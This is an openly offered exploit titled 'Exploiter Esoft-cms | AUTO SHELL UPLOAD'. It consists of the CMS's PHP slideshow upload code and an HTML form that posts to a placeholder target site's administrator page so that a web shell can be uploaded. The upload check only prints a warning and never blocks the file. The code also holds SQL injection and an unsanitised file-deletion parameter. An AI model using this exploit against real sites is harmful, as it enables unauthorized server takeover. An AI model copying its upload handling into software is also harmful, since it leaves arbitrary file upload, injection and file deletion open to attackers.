Exploit Esoft-CMS

1.  
2. <?php
3. if(isset($_POST['seve_photo'])){
4. $select="select * from slideshow order by id DESC limit 1";
5. $pquery=mysql_query($select) or die("cant connect in to data base");
6. if($id=mysql_fetch_array($pquery)){
7. $id1=$id['id'];
8. }
9. $id1=$id1++;
10. $photo_name="slide_photo".$id1;
11. if(isset($_FILES['sl_photo_browse'])){
12. $file=$_FILES['sl_photo_browse'];
13. $upload_directory='images/slideshow/';
14. $ext_str = "jpg,jpeg,gif,png";
15. $allowed_extensions=explode(',',$ext_str);
16. $max_file_size = 10485760;//10 mb remember 1024bytes =1kbytes /* check allowed extensions here */
17. $ext = substr($file['name'], strrpos($file['name'], '.') + 1); //get file extension from last sub string from last . character
18. if (!in_array($ext, $allowed_extensions) ) {
19. echo "only".$ext_str." files allowed to upload"; // exit the script by warning
20. } /* check file size of the file if it exceeds the specified size warn user */
21. if($file['size']>=$max_file_size){
22. echo "only the file less than ".$max_file_size."mb allowed to upload"; // exit the script by warning
23. }
24. $path=$photo_name.'.'.$ext;
25. if(move_uploaded_file($file['tmp_name'],$upload_directory.$path)){
26. $uploadfile=$path;
27. }
28. else{
29. echo "The file cant moved to target directory."; //file can't moved with unknown reasons likr cleaning of server temperory files cleaning
30. }
31. }
32. $slideshow_title=mysql_real_escape_string($_POST['sl_photo_caption']);
33. $sl_url = mysql_real_escape_string($_POST['sl_url']);
34. $position = mysql_real_escape_string($_POST['position']);
35. $page = mysql_real_escape_string($_POST['page']);
36. $insert="insert into slideshow(photo,slide_title,url,position,page) values ('$uploadfile','$slideshow_title','$sl_url','$position','$page')";
37. if(mysql_query($insert)){
38. echo '<script type="text/javascript">alert("Photo Insert Successfully");</script>';
39. }
40. else{
41. echo '<script type="text/javascript">alert("error!");</script>';
42. }
43. }
44. ?>
45. <style type="text/css">
46. <!--
47. .style1 {color: #FF0000}
48. -->
49. </style>
50. <form action="http://alamatwebsitetarget.com/esoft-cms/administrator.php?admin_page=banner_slide.php&status=delete" method="post" enctype="multipart/form-data">
51. Exploiter Esoft-cms | AUTO SHELL UPLOAD | exploit Founded And Author By Eagle_One
52. <br />
53. <table border="1" class="slideshow_select_option" width="500">
54. <tr>
55. <td><p>Select Photo</p></td>
56. <td><input type="file" name="sl_photo_browse"/></td>
57. </tr>
58. <tr>
59. <td>Slide Caption</td>
60. <td><textarea name="sl_photo_caption"> </textarea></td>
61. </tr>
62.  
63. <tr>
64. <td>Slide position(home Page)</td>
65. <td> <select name="position"> <option value=""> Select Option </option>
66. <option value="1"> Left Side </option>
67. <option value="2"> Right Side </option>
68. </select>
69. </td>
70. </tr>
71. <tr>
72. <td>Slide position(Other Page)</td>
73. <td>
74. <select name="page"> <option value=""> Select Page Name </option>
75. <?php
76. $sql="select * from content";
77. $rec=mysql_query($sql);
78. $S=0;
79. while($row=mysql_fetch_array($rec)){
80. $S++;
81. ?>
82. <option value="<?php echo $row['id']; ?>"><?php echo $row['content_title']; ?></option>
83. <?php
84. }
85. ?>
86. </select>
87. </td>
88. </tr>
89. <tr>
90. </tr>
91.  
92.  
93. <tr>
94. <td colspan="2"><input type="submit" name="seve_photo" class="log-twitter" value="Save Photo" /></td>
95. </tr>
96. </table>
97. </form>
98. <?php if(isset($_GET['confirm']) && $_GET['confirm']=="yes"){
99. $photoid=$_GET['id'];
100. $img=$_GET['img'];
101. $pdelete="delete from slideshow where id='$photoid'";
102. if(mysql_query($pdelete)){
103. unlink("./images/slideshow/".$img);
104. echo '<script type="text/javascript">alert("Photo Delete Successfully");location.href="?admin_page=banner_slide.php&status=delete"</script>';
105. }
106. }
107. ?>
108. <form action="<?php $_SERVER['PHP_SELF'];?>" method="post" enctype="multipart/form-data">
109. <?php if(isset($_GET['status']) & $_GET['status']=="delete"){ ?>
110. <br />
111. <h3>Edit or Delete Photo</h3>
112. <br />
113. <table width="500" border="1" style="font-size:12px;">
114. <tr>
115. <td width="50"><strong>Si. No</strong></td>
116. <td width="50"><strong>Preview</strong></td>
117. <td><strong> Caption </strong></td>
118. <td><strong> Page </strong></td>
119.  
120. <td width="80"><strong>Action</strong></td>
121. </tr>
122.  
123.  
124. <?php $selectsli="select * from slideshow";
125. $querysli=mysql_query($selectsli);
126. $si_count=0;
127. while($sliphoto=mysql_fetch_array($querysli)){
128. $si_count++;
129. ?>
130. <tr>
131. <td><?php echo $si_count; ?></td>
132. <td><img src="./images/slideshow/<?php echo $sliphoto['photo']; ?>" width="50" height="50"/></td>
133. <td><?php echo $sliphoto['slide_title']; ?></td>
134. <td><?php echo $sliphoto['page']; ?></td>
135.  
136. <td><a href="?admin_page=banner_slide.php&status=delete&confirm=yes&id=<?php echo $sliphoto['id'];?>&img=<?php echo $sliphoto['photo']; ?>" onclick="return confirm('Are you sure?');">Delete</a></td>
137. </tr>
138. <?php } ?>
139. </table>
140. <?php } ?>
141. </form>